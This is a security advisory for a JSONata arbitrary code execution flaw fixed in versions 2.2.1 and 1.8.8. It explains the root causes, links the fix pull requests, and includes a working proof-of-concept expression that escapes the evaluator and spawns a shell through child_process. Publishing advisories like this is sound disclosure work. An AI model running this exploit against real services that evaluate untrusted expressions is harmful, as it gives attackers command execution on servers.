GHSA-66mm-25pp-rfff
JSONata vulnerable to Arbitrary Code Execution via crafted JSONata expressions
Quick fix
GHSA-66mm-25pp-rfff — jsonata: upgrade to the fixed version with the command below.
npm install jsonata@2.2.1 Details
Before JSONata `2.2.1` and `1.8.8` it was possible to execute arbitrary code with crafted expressions, due to: - overwriting `$clone` allowing mutation of objects via transforms (see [`evaluateTransformExpression`](https://github.com/jsonata-js/jsonata/blob/8ee4476f8a228bfc7a62979ae0a9c13a4043cd03/src/jsonata.js#L1304-L1314)) - it being possible to destruct jsonata functions/lambdas (e.g. `$merge.*`) - [applyProcedure](https://github.com/jsonata-js/jsonata/blob/8ee4476f8a228bfc7a62979ae0a9c13a4043cd03/src/jsonata.js#L1670C20-L1675) using `proc.arguments.forEach` and not `Array.prototype.forEach`
Which could be chained to execute arbitrary code.
This was fixed with:
- https://github.com/jsonata-js/jsonata/pull/799 (https://github.com/jsonata-js/jsonata/pull/799/changes#diff-de23c1b6e199d0e59406a284aae5fa7be63fcbbff706829913dba73dcdeb061cL1673-R1673) - https://github.com/jsonata-js/jsonata/pull/800 - https://github.com/jsonata-js/jsonata/pull/802
Which are included in the `2.2.1` release. Fixes were then back-ported to the `1.8.8` release.
## PoC
```js import jsonata from "jsonata";
const expression = jsonata(` ( $obj := {}; $clone := function($o) { $o }; $m := ($merge.*)[1];
$fn := function($a) { ( $a({"value":"lg"},"__lookupGetter__"); $a({"value":"x"},"x"); ) };
$nop := function() { $ };
$capture := function($val) { $obj ~> | $obj | {"x": 1, "y": 1, "lg":$lg} | };
$ ~> | $ | $m([$nop,{"_jsonata_lambda":false}])|; $ ~> | $ | {"arguments":{"forEach": $spread($fn)}}|; $ ~> | $ | {"body":$m([$capture,{"_jsonata_lambda":false}]).body}|; $func := $m([$,{"_jsonata_lambda":true}]); $func();
$gP := $obj.lg("__proto__");
$afn:=$spread($fn); $afn{"x":$gP().constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})")()}; ) `);
await expression.evaluate({}); ```
## References
- https://github.com/jsonata-js/jsonata/pull/799 - https://github.com/jsonata-js/jsonata/pull/799/changes#diff-de23c1b6e199d0e59406a284aae5fa7be63fcbbff706829913dba73dcdeb061cL1673-R1673 - https://github.com/jsonata-js/jsonata/commit/c41ef185136a7b96ca1049c7745a7503b82193de
- https://github.com/jsonata-js/jsonata/pull/800 - https://github.com/jsonata-js/jsonata/commit/d49dcdd01a4617e5601edda3ce9a971a791126dc
- https://github.com/jsonata-js/jsonata/pull/802 - https://github.com/jsonata-js/jsonata/commit/e362dfd686c1dadd1dd9324373819be446fd4f04
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/jsonata-js/jsonata/security/advisories/GHSA-66mm-25pp-rfff [WEB]
- https://github.com/jsonata-js/jsonata/pull/799 [WEB]
- https://github.com/jsonata-js/jsonata/pull/800 [WEB]
- https://github.com/jsonata-js/jsonata/pull/802 [WEB]
- https://github.com/jsonata-js/jsonata/commit/47c0e58542202c705726663166dbee5fcae47d06 [WEB]
- https://github.com/jsonata-js/jsonata/commit/4b217d514376e30cba278941298d7ba97c4a6c6e [WEB]
- https://github.com/jsonata-js/jsonata/commit/59e25144fc3b7125f6befd71b8a6e14e1fa610d2 [WEB]
- https://github.com/jsonata-js/jsonata/commit/f09df8416eab8ff44926fc6527c80fb8701de159 [WEB]
- https://github.com/jsonata-js/jsonata/commit/f174348c7fa30f271b63ddedf0767e814004bc4d [WEB]
- https://github.com/jsonata-js/jsonata [PACKAGE]
- https://github.com/jsonata-js/jsonata/releases/tag/v1.8.8 [WEB]
- https://github.com/jsonata-js/jsonata/releases/tag/v2.2.1 [WEB]